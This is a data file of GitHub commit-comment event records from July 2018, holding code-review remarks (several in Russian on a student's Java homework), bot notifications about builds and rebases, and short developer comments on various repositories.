{"id":"8034530359","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework2"},"payload":{"comment":{"id":29876670,"position":25,"line":25,"path":"lesson9/TaskDemo2.java","commit_id":"ee623d9abd9e115c682dd8235339d6ecd56175bb","created_at":"2018-07-29T19:45:33Z","updated_at":"2018-07-29T19:45:33Z","author_association":"NONE","body":"не надо вызывать toString у списка, просто sout(students)"}},"created_at":"2018-07-29T19:45:33Z"}
{"id":"8034530828","type":"CommitCommentEvent","actor":{"login":"ticia37"},"repo":{"name":"ticia37/ma-page"},"payload":{"comment":{"id":29876671,"position":null,"line":null,"path":null,"commit_id":"c5afdedfc0d57b088e35fed3ecec74e87d1b5fb7","created_at":"2018-07-29T19:45:52Z","updated_at":"2018-07-29T19:45:52Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-29T19:45:52Z"}
{"id":"8034531175","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework2"},"payload":{"comment":{"id":29876672,"position":47,"line":47,"path":"lesson9/TaskDemo2.java","commit_id":"ee623d9abd9e115c682dd8235339d6ecd56175bb","created_at":"2018-07-29T19:46:06Z","updated_at":"2018-07-29T19:46:06Z","author_association":"NONE","body":"метод с двумя обязанностями - и находит и выводит на консоль. Да и называется он так, будето вернет что-то, не корректно"}},"created_at":"2018-07-29T19:46:06Z"}
{"id":"8034531478","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework2"},"payload":{"comment":{"id":29876673,"position":38,"line":38,"path":"lesson9/TaskDemo2.java","commit_id":"ee623d9abd9e115c682dd8235339d6ecd56175bb","created_at":"2018-07-29T19:46:16Z","updated_at":"2018-07-29T19:46:16Z","author_association":"NONE","body":"опять все в main, все выносим в утилитные классы"}},"created_at":"2018-07-29T19:46:16Z"}
{"id":"8034531890","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework2"},"payload":{"comment":{"id":29876674,"position":40,"line":40,"path":"lesson9/TaskDemo2.java","commit_id":"ee623d9abd9e115c682dd8235339d6ecd56175bb","created_at":"2018-07-29T19:46:31Z","updated_at":"2018-07-29T19:46:31Z","author_association":"NONE","body":"даем нормальные названия переменным"}},"created_at":"2018-07-29T19:46:31Z"}
{"id":"8034532670","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29876675,"position":null,"line":null,"path":null,"commit_id":"d0bccafe0c9820a471cf8a823f3b5cbc54df7734","created_at":"2018-07-29T19:47:03Z","updated_at":"2018-07-29T19:47:03Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-54](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-54).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-54-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-29T19:47:03Z"}
{"id":"8034534508","type":"CommitCommentEvent","actor":{"login":"Powersource"},"repo":{"name":"ipfs/pm"},"payload":{"comment":{"id":29876676,"position":null,"line":null,"path":null,"commit_id":"309437a262c95baba5ce24afec6d52408172df53","created_at":"2018-07-29T19:48:19Z","updated_at":"2018-07-29T19:48:19Z","author_association":"NONE","body":"Do you know if it's still like this? I'm running i3 without a compositor but when I click share screen in a meeting it correctly shows previews of the different screens/windows. Tbf they seem to be screenshots and they might use some other method for the actual video, idk."}},"created_at":"2018-07-29T19:48:19Z"}
{"id":"8034534639","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework2"},"payload":{"comment":{"id":29876677,"position":6,"line":6,"path":"lesson7/Circle.java","commit_id":"0fa3f3de184187fc96529343f7dd7bf627361274","created_at":"2018-07-29T19:48:25Z","updated_at":"2018-07-29T19:48:25Z","author_association":"NONE","body":"static должна быть константа, т.к. она будет одинакова для всех объектов класса Circle, а в твоем случае будет создаваться новая константа каждый раз при инстанцировании объекта класса Cirle. Да и потом, эта константа есть в классе Math, изучаем внимательно API"}},"created_at":"2018-07-29T19:48:25Z"}
{"id":"8034535391","type":"CommitCommentEvent","actor":{"login":"Sillium007"},"repo":{"name":"andrewning/sortphotos"},"payload":{"comment":{"id":29876685,"position":null,"line":null,"path":null,"commit_id":"318d466596f0fa4f01b8e8c3d778f5f81f047ac9","created_at":"2018-07-29T19:48:52Z","updated_at":"2018-07-29T19:48:52Z","author_association":"CONTRIBUTOR","body":"I don't think this is the right place to ask a question which seems not related to this commit.\r\nI think you should ask under \"issues\". But have you installed perl and Exiftool? This script depends on it. "}},"created_at":"2018-07-29T19:48:52Z"}
{"id":"8034535466","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework2"},"payload":{"comment":{"id":29876686,"position":24,"line":24,"path":"lesson7/Circle.java","commit_id":"0fa3f3de184187fc96529343f7dd7bf627361274","created_at":"2018-07-29T19:48:55Z","updated_at":"2018-07-29T19:48:55Z","author_association":"NONE","body":"этот метод будет общим для всех фигур, почему его реализация не в базовом классе?"}},"created_at":"2018-07-29T19:48:55Z"}
{"id":"8034535669","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework2"},"payload":{"comment":{"id":29876687,"position":13,"line":13,"path":"lesson7/Demo.java","commit_id":"0fa3f3de184187fc96529343f7dd7bf627361274","created_at":"2018-07-29T19:49:04Z","updated_at":"2018-07-29T19:49:04Z","author_association":"NONE","body":"не надо лишних пропусков строк делать"}},"created_at":"2018-07-29T19:49:04Z"}
{"id":"8034536375","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework2"},"payload":{"comment":{"id":29876689,"position":7,"line":7,"path":"lesson7/Figure.java","commit_id":"0fa3f3de184187fc96529343f7dd7bf627361274","created_at":"2018-07-29T19:49:34Z","updated_at":"2018-07-29T19:49:34Z","author_association":"NONE","body":"не надо toString выносить в свои интерфейсы, этот метод и так есть в классе Object"}},"created_at":"2018-07-29T19:49:34Z"}
{"id":"8034536675","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework2"},"payload":{"comment":{"id":29876692,"position":1,"line":1,"path":"lesson7/Parallelogram.java","commit_id":"0fa3f3de184187fc96529343f7dd7bf627361274","created_at":"2018-07-29T19:49:46Z","updated_at":"2018-07-29T19:49:46Z","author_association":"NONE","body":"не называть пакет во множественном числе"}},"created_at":"2018-07-29T19:49:46Z"}
{"id":"8034537420","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework2"},"payload":{"comment":{"id":29876699,"position":35,"line":35,"path":"lesson7/Rectangle.java","commit_id":"0fa3f3de184187fc96529343f7dd7bf627361274","created_at":"2018-07-29T19:50:16Z","updated_at":"2018-07-29T19:50:16Z","author_association":"NONE","body":"вот видишь, как ты дублируешь код везде, нехорошо это"}},"created_at":"2018-07-29T19:50:16Z"}
{"id":"8034538061","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework2"},"payload":{"comment":{"id":29876701,"position":3,"line":3,"path":"lesson7/ShapeUtils.java","commit_id":"0fa3f3de184187fc96529343f7dd7bf627361274","created_at":"2018-07-29T19:50:43Z","updated_at":"2018-07-29T19:50:43Z","author_association":"NONE","body":"утилитный класс final и private конструктор, он не должен быть абстрактным"}},"created_at":"2018-07-29T19:50:43Z"}
{"id":"8034538377","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework2"},"payload":{"comment":{"id":29876703,"position":5,"line":5,"path":"lesson7/ShapeUtils.java","commit_id":"0fa3f3de184187fc96529343f7dd7bf627361274","created_at":"2018-07-29T19:50:56Z","updated_at":"2018-07-29T19:50:56Z","author_association":"NONE","body":"у него так же и состояния никакого нет и быть не может"}},"created_at":"2018-07-29T19:50:56Z"}
{"id":"8034540907","type":"CommitCommentEvent","actor":{"login":"morhimi"},"repo":{"name":"home-assistant/hassos"},"payload":{"comment":{"id":29876706,"position":5,"line":6,"path":"Documentation/kernel.md","commit_id":"48500a6c6e0617ced4fb93466df7dc249a8f2d8b","created_at":"2018-07-29T19:52:46Z","updated_at":"2018-07-29T19:52:46Z","author_association":"NONE","body":"*Appliance*"}},"created_at":"2018-07-29T19:52:46Z"}
{"id":"8034541075","type":"CommitCommentEvent","actor":{"login":"neerajradhe01"},"repo":{"name":"neerajradhe01/ProjectX"},"payload":{"comment":{"id":29876707,"position":null,"line":null,"path":null,"commit_id":"353a8066943e4928654600417f006479a83609d9","created_at":"2018-07-29T19:52:52Z","updated_at":"2018-07-29T19:52:52Z","author_association":"OWNER","body":"Hello Git hub.....World "}},"created_at":"2018-07-29T19:52:52Z"}
{"id":"8034541444","type":"CommitCommentEvent","actor":{"login":"synth3tk"},"repo":{"name":"derrickmehaffy/strapi"},"payload":{"comment":{"id":29876708,"position":23,"line":197,"path":"packages/strapi-plugin-users-permissions/services/Providers.js","commit_id":"1b0579db22b50421994fc9ffda4710846920c768","created_at":"2018-07-29T19:53:09Z","updated_at":"2018-07-29T19:53:09Z","author_association":"NONE","body":"Add a `break;` after line 197."}},"created_at":"2018-07-29T19:53:09Z"}
{"id":"8034542688","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29876720,"position":null,"line":null,"path":null,"commit_id":"574b3f60131f624ecc5601a9cae2bbdaf20db3b7","created_at":"2018-07-29T19:54:02Z","updated_at":"2018-07-29T19:54:02Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-55](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-55).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-55-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-29T19:54:02Z"}
{"id":"8034543899","type":"CommitCommentEvent","actor":{"login":"YaroST12"},"repo":{"name":"EssentialOpenSource/linux"},"payload":{"comment":{"id":29876725,"position":null,"line":null,"path":null,"commit_id":"aae5fda6f5ef5b529cb5027cda824fe33267badd","created_at":"2018-07-29T19:54:52Z","updated_at":"2018-07-29T19:54:52Z","author_association":"NONE","body":"You should have added commit message.\r\nhttps://android.googlesource.com/kernel/common/+/362e08d2572fd592b6a5322763977d898ebefba2"}},"created_at":"2018-07-29T19:54:52Z"}
{"id":"8034544250","type":"CommitCommentEvent","actor":{"login":"mtwilliams"},"repo":{"name":"graphitemaster/discord-rogue"},"payload":{"comment":{"id":29876730,"position":31,"line":1197,"path":"rogue.js","commit_id":"056c9ed3b5d07ceef78e1a067053e6b6f87b67cc","created_at":"2018-07-29T19:55:06Z","updated_at":"2018-07-29T19:55:06Z","author_association":"NONE","body":"@graphitemaster you could use `/([wasd]+)(\\d+)?/i` instead."}},"created_at":"2018-07-29T19:55:06Z"}
{"id":"8034548776","type":"CommitCommentEvent","actor":{"login":"adamint"},"repo":{"name":"Terminal/Discord_Fork"},"payload":{"comment":{"id":29876738,"position":null,"line":null,"path":null,"commit_id":"b55d716eee660ad0443ba6276e9190f36d4d588e","created_at":"2018-07-29T19:58:18Z","updated_at":"2018-07-29T19:58:18Z","author_association":"NONE","body":"That's good"}},"created_at":"2018-07-29T19:58:18Z"}
{"id":"8034549427","type":"CommitCommentEvent","actor":{"login":"solardiz"},"repo":{"name":"cryptozeny/bitzeny"},"payload":{"comment":{"id":29876739,"position":10,"line":10,"path":"src/crypto/yespower-0.5/yespower.c","commit_id":"ea21675aab1b507de0815ab61202b50aa15c469e","created_at":"2018-07-29T19:58:45Z","updated_at":"2018-07-29T19:58:45Z","author_association":"NONE","body":"The cast to `yespower_binary_t` for the input is both wrong and unneeded. But this isn't why this crashes."}},"created_at":"2018-07-29T19:58:45Z"}
{"id":"8033214059","type":"CommitCommentEvent","actor":{"login":"nnposter"},"repo":{"name":"nmap/nmap"},"payload":{"comment":{"id":29871848,"position":null,"line":null,"path":null,"commit_id":"6c848f1c851ca66c9928e88a12b519639815c762","created_at":"2018-07-29T02:03:23Z","updated_at":"2018-07-29T02:03:23Z","author_association":"NONE","body":"@b4ldr, FYI, I have made additional changes in the surrounding code"}},"created_at":"2018-07-29T02:03:23Z"}
{"id":"8033214895","type":"CommitCommentEvent","actor":{"login":"RobotPrototype"},"repo":{"name":"RobotPrototype/RedBit"},"payload":{"comment":{"id":29871852,"position":null,"line":null,"path":null,"commit_id":"e980ffb990c5ca6614c45e19198c902940ed9b27","created_at":"2018-07-29T02:04:09Z","updated_at":"2018-07-29T02:04:09Z","author_association":"OWNER","body":"Looks great! Seems like it was a matter of figuring out how to do what you thought might be the solution.\r\n\r\nI'm curious about how the canvas size relates to our idea of a \"Room.\""}},"created_at":"2018-07-29T02:04:09Z"}
{"id":"8033216307","type":"CommitCommentEvent","actor":{"login":"mattn"},"repo":{"name":"vim/vim"},"payload":{"comment":{"id":29871856,"position":3,"line":103,"path":"src/version.c","commit_id":"83ec2a7f5fb481b30a5d556b6aad49a62585bccd","created_at":"2018-07-29T02:05:36Z","updated_at":"2018-07-29T02:05:36Z","author_association":"NONE","body":"関係なく"}},"created_at":"2018-07-29T02:05:36Z"}
{"id":"8033220327","type":"CommitCommentEvent","actor":{"login":"mattn"},"repo":{"name":"vim/vim"},"payload":{"comment":{"id":29871865,"position":null,"line":null,"path":null,"commit_id":"83ec2a7f5fb481b30a5d556b6aad49a62585bccd","created_at":"2018-07-29T02:10:09Z","updated_at":"2018-07-29T02:10:09Z","author_association":"NONE","body":"Sorry, I mis-operated my mobile phone."}},"created_at":"2018-07-29T02:10:09Z"}
{"id":"8033221248","type":"CommitCommentEvent","actor":{"login":"ablodge"},"repo":{"name":"nert-gu/Xposition"},"payload":{"comment":{"id":29871866,"position":14,"line":843,"path":"wiki/plugins/metadata/models.py","commit_id":"efc9a4b05c459a4f88bc00b2fd5bd917a235aa0c","created_at":"2018-07-29T02:11:09Z","updated_at":"2018-07-29T02:11:09Z","author_association":"CONTRIBUTOR","body":"It's 200 by default. I increased it to 300 by mistake instead of ss description. "}},"created_at":"2018-07-29T02:11:09Z"}
{"id":"8033223796","type":"CommitCommentEvent","actor":{"login":"Tdual"},"repo":{"name":"Tdual/matrixflow"},"payload":{"comment":{"id":29871872,"position":null,"line":null,"path":null,"commit_id":"2b01b7f13f3c67dc164bd3e2a2b940c232d4e727","created_at":"2018-07-29T02:14:00Z","updated_at":"2018-07-29T02:14:00Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Make it possible to upload labels](https://trello.com/c/lWFAeOpn/28-make-it-possible-to-upload-labels)"}},"created_at":"2018-07-29T02:14:00Z"}
{"id":"8033225796","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"pkgw/rubbl"},"payload":{"comment":{"id":29871880,"position":null,"line":null,"path":null,"commit_id":"de56cc04bcb9135046e7ec652394ebcaac6680a0","created_at":"2018-07-29T02:16:05Z","updated_at":"2018-07-29T02:16:05Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #2 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-29T02:16:05Z"}
{"id":"8033226090","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"pkgw/rubbl"},"payload":{"comment":{"id":29871881,"position":null,"line":null,"path":null,"commit_id":"9df7e484302fe025b4f1497cf9c19d4f08cf4d1a","created_at":"2018-07-29T02:16:23Z","updated_at":"2018-07-29T02:16:23Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #3 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-29T02:16:23Z"}
{"id":"8033226248","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"pkgw/rubbl"},"payload":{"comment":{"id":29871883,"position":null,"line":null,"path":null,"commit_id":"bccde4fa6567ebfb5631ebbdc22137cc60bef613","created_at":"2018-07-29T02:16:33Z","updated_at":"2018-07-29T02:16:33Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #4 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-29T02:16:33Z"}
{"id":"8033226444","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"pkgw/rubbl"},"payload":{"comment":{"id":29871884,"position":null,"line":null,"path":null,"commit_id":"d181a496cd3ac7e4a67aa5505fa0f77130c46c7f","created_at":"2018-07-29T02:16:47Z","updated_at":"2018-07-29T02:16:47Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #5 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-29T02:16:47Z"}
{"id":"8033226728","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"pkgw/rubbl"},"payload":{"comment":{"id":29871886,"position":null,"line":null,"path":null,"commit_id":"2144f421cf60c8a989b69aa5ff21e2e41248b24b","created_at":"2018-07-29T02:17:03Z","updated_at":"2018-07-29T02:17:03Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #6 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-29T02:17:03Z"}
{"id":"8033230683","type":"CommitCommentEvent","actor":{"login":"dragkb"},"repo":{"name":"Serhii-Vorobiov/NewPractice"},"payload":{"comment":{"id":29871895,"position":null,"line":null,"path":null,"commit_id":"ec46df37b85987daad8b3b106836c111e5f9d39d","created_at":"2018-07-29T02:21:15Z","updated_at":"2018-07-29T02:21:15Z","author_association":"COLLABORATOR","body":"Resolved merge conflict. 2 lines has been deleted and 5 lines added. Test 8 has been left as master"}},"created_at":"2018-07-29T02:21:15Z"}
{"id":"8033231574","type":"CommitCommentEvent","actor":{"login":"wildonj"},"repo":{"name":"google/go-cloud"},"payload":{"comment":{"id":29871896,"position":11,"line":26,"path":"go.mod","commit_id":"eefd8be3c4fb6d2ecf7e0aeeb2834940e9ac914d","created_at":"2018-07-29T02:22:04Z","updated_at":"2018-07-29T02:22:04Z","author_association":"NONE","body":"Ggf"}},"created_at":"2018-07-29T02:22:04Z"}
{"id":"8033247292","type":"CommitCommentEvent","actor":{"login":"KnifuWaifu"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29871936,"position":null,"line":null,"path":null,"commit_id":"12bda1bea8e8de8cac91f6f5c1b5bf943c353af9","created_at":"2018-07-29T02:38:50Z","updated_at":"2018-07-29T02:38:50Z","author_association":"NONE","body":"🅱️"}},"created_at":"2018-07-29T02:38:50Z"}
{"id":"8033249633","type":"CommitCommentEvent","actor":{"login":"Tdual"},"repo":{"name":"Tdual/matrixflow"},"payload":{"comment":{"id":29871943,"position":null,"line":null,"path":null,"commit_id":"693f35fa94a6800fde54e1e59da1dc4f01731ce4","created_at":"2018-07-29T02:41:22Z","updated_at":"2018-07-29T02:41:22Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [The progress gauge of uploading files doesn't work.](https://trello.com/c/2VgxgLDZ/29-the-progress-gauge-of-uploading-files-doesnt-work)"}},"created_at":"2018-07-29T02:41:22Z"}
{"id":"8033249827","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29871945,"position":null,"line":null,"path":null,"commit_id":"9d3da2ceb7bd1e839fa5971042b8adbbd1348095","created_at":"2018-07-29T02:41:36Z","updated_at":"2018-07-29T02:41:36Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: Tests Failed (764 of 2327 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 625\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d3da2ceb7bd1e839fa5971042b8adbbd1348095-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d3da2ceb7bd1e839fa5971042b8adbbd1348095-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-32.83%25-red.png)</a> \n"}},"created_at":"2018-07-29T02:41:36Z"}
{"id":"8033252749","type":"CommitCommentEvent","actor":{"login":"nung0714"},"repo":{"name":"facebook/react"},"payload":{"comment":{"id":29871953,"position":null,"line":null,"path":null,"commit_id":"183aefa51f5b7b18bde05dccdd417b8983d741d0","created_at":"2018-07-29T02:44:33Z","updated_at":"2018-07-29T02:44:33Z","author_association":"NONE","body":"JavaScript ] (https://reactjs.org/docs/create-a-new-react-app.html)"}},"created_at":"2018-07-29T02:44:33Z"}
{"id":"8033260505","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"SwiftIsAFakeDeveloper/ChatScrambler"},"payload":{"comment":{"id":29871982,"position":null,"line":null,"path":null,"commit_id":"e3148c700f1216f830adcad40370d638d3467fe3","created_at":"2018-07-29T02:53:20Z","updated_at":"2018-07-29T02:53:20Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/SwiftIsAFakeDeveloper/ChatScrambler/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `8bc26a0e-92da-11e8-9235-2a902d6af5ac`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-29T02:53:20Z"}
{"id":"8033260584","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29871983,"position":82,"line":140,"path":"RockPaperScissors.sol","commit_id":"a51e296116c99dd52710a9046c08cf9bcc47b957","created_at":"2018-07-29T02:53:26Z","updated_at":"2018-07-29T02:53:26Z","author_association":"OWNER","body":"prevent rainbow attack by including `address(this)`"}},"created_at":"2018-07-29T02:53:26Z"}
{"id":"8033260979","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29871986,"position":7,"line":5,"path":"RockPaperScissorsUtils.sol","commit_id":"a51e296116c99dd52710a9046c08cf9bcc47b957","created_at":"2018-07-29T02:53:50Z","updated_at":"2018-07-29T02:53:50Z","author_association":"OWNER","body":"switched to uint for cheaper calculations "}},"created_at":"2018-07-29T02:53:50Z"}
{"id":"8033261397","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29871991,"position":23,"line":60,"path":"RockPaperScissors.sol","commit_id":"a51e296116c99dd52710a9046c08cf9bcc47b957","created_at":"2018-07-29T02:54:19Z","updated_at":"2018-07-29T02:54:19Z","author_association":"OWNER","body":"remove anti (type for ante) from method params"}},"created_at":"2018-07-29T02:54:19Z"}
{"id":"8033261684","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29871992,"position":19,"line":16,"path":"RockPaperScissors.sol","commit_id":"e5e5f0de640c408ce0742728aea97f664c8667f2","created_at":"2018-07-29T02:54:40Z","updated_at":"2018-07-29T02:54:40Z","author_association":"OWNER","body":"switched to enums"}},"created_at":"2018-07-29T02:54:40Z"}
{"id":"8033262116","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29871994,"position":57,"line":47,"path":"RockPaperScissors.sol","commit_id":"e5e5f0de640c408ce0742728aea97f664c8667f2","created_at":"2018-07-29T02:55:12Z","updated_at":"2018-07-29T02:55:12Z","author_association":"OWNER","body":"more descriptive variable names"}},"created_at":"2018-07-29T02:55:12Z"}
{"id":"8033263030","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29872002,"position":73,"line":60,"path":"RockPaperScissors.sol","commit_id":"e5e5f0de640c408ce0742728aea97f664c8667f2","created_at":"2018-07-29T02:56:10Z","updated_at":"2018-07-29T02:56:10Z","author_association":"OWNER","body":"creator creates game and submits encrypted move with one method"}},"created_at":"2018-07-29T02:56:10Z"}
{"id":"8033263426","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29872003,"position":109,"line":93,"path":"RockPaperScissors.sol","commit_id":"e5e5f0de640c408ce0742728aea97f664c8667f2","created_at":"2018-07-29T02:56:35Z","updated_at":"2018-07-29T02:56:35Z","author_association":"OWNER","body":"only second player can call this method now"}},"created_at":"2018-07-29T02:56:35Z"}
{"id":"8033263916","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29872004,"position":null,"line":null,"path":null,"commit_id":"96b407017914bfca9374cbc27ce065faf231df6f","created_at":"2018-07-29T02:57:08Z","updated_at":"2018-07-29T02:57:08Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-437](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-437).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-437-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-29T02:57:08Z"}
{"id":"8033264443","type":"CommitCommentEvent","actor":{"login":"DarrylChallenger"},"repo":{"name":"DarrylChallenger/Blackjack"},"payload":{"comment":{"id":29872005,"position":null,"line":null,"path":null,"commit_id":"78fc384c5fc76ef47ca50fb9586fad4869d47661","created_at":"2018-07-29T02:57:41Z","updated_at":"2018-07-29T02:57:41Z","author_association":"OWNER","body":"Check OK"}},"created_at":"2018-07-29T02:57:41Z"}
{"id":"8033264970","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29872009,"position":5,"line":182,"path":"RockPaperScissors.sol","commit_id":"36f95ec70f2f9af96d6a6c6880a77935edf8d818","created_at":"2018-07-29T02:58:17Z","updated_at":"2018-07-29T02:58:17Z","author_association":"OWNER","body":"nuff said"}},"created_at":"2018-07-29T02:58:17Z"}
{"id":"8033265462","type":"CommitCommentEvent","actor":{"login":"JaPNaA"},"repo":{"name":"JaPNaA/JaPNaA.github.io"},"payload":{"comment":{"id":29872012,"position":12,"line":11,"path":"content/changelog.txt","commit_id":"940d5601299e9986ecb2163323508f5f32e81a59","created_at":"2018-07-29T02:58:53Z","updated_at":"2018-07-29T02:58:53Z","author_association":"OWNER","body":"notice that i made a typo here"}},"created_at":"2018-07-29T02:58:53Z"}
{"id":"8033265516","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29872014,"position":23,"line":200,"path":"RockPaperScissors.sol","commit_id":"36f95ec70f2f9af96d6a6c6880a77935edf8d818","created_at":"2018-07-29T02:58:56Z","updated_at":"2018-07-29T02:58:56Z","author_association":"OWNER","body":"next stretch goal"}},"created_at":"2018-07-29T02:58:56Z"}
{"id":"8033265714","type":"CommitCommentEvent","actor":{"login":"Carson2006"},"repo":{"name":"KSP-KOS/KOS"},"payload":{"comment":{"id":29872020,"position":null,"line":null,"path":null,"commit_id":"83076f345cd86eaebd6fa7f0dd8810c22016bfa0","created_at":"2018-07-29T02:59:11Z","updated_at":"2018-07-29T02:59:11Z","author_association":"NONE","body":"Thank you for doing this.\r\n\r\nI assume this will be applied to the next release of KOS?\r\n\r\nIf not, how may I get your fix implemented?"}},"created_at":"2018-07-29T02:59:11Z"}
{"id":"8034551819","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29876760,"position":112,"line":1242,"path":"pom.xml","commit_id":"5111b0be159e7248721930bb48ceff596bd5051b","created_at":"2018-07-29T20:00:17Z","updated_at":"2018-07-29T20:00:17Z","author_association":"CONTRIBUTOR","body":"I've changed it already in my new POM branch.\r\nTo be coherent with the other builds we better set:\r\n`<outputFile>${project.name.short}-${project.version}-setup.exe</outputFile>`\r\n"}},"created_at":"2018-07-29T20:00:17Z"}
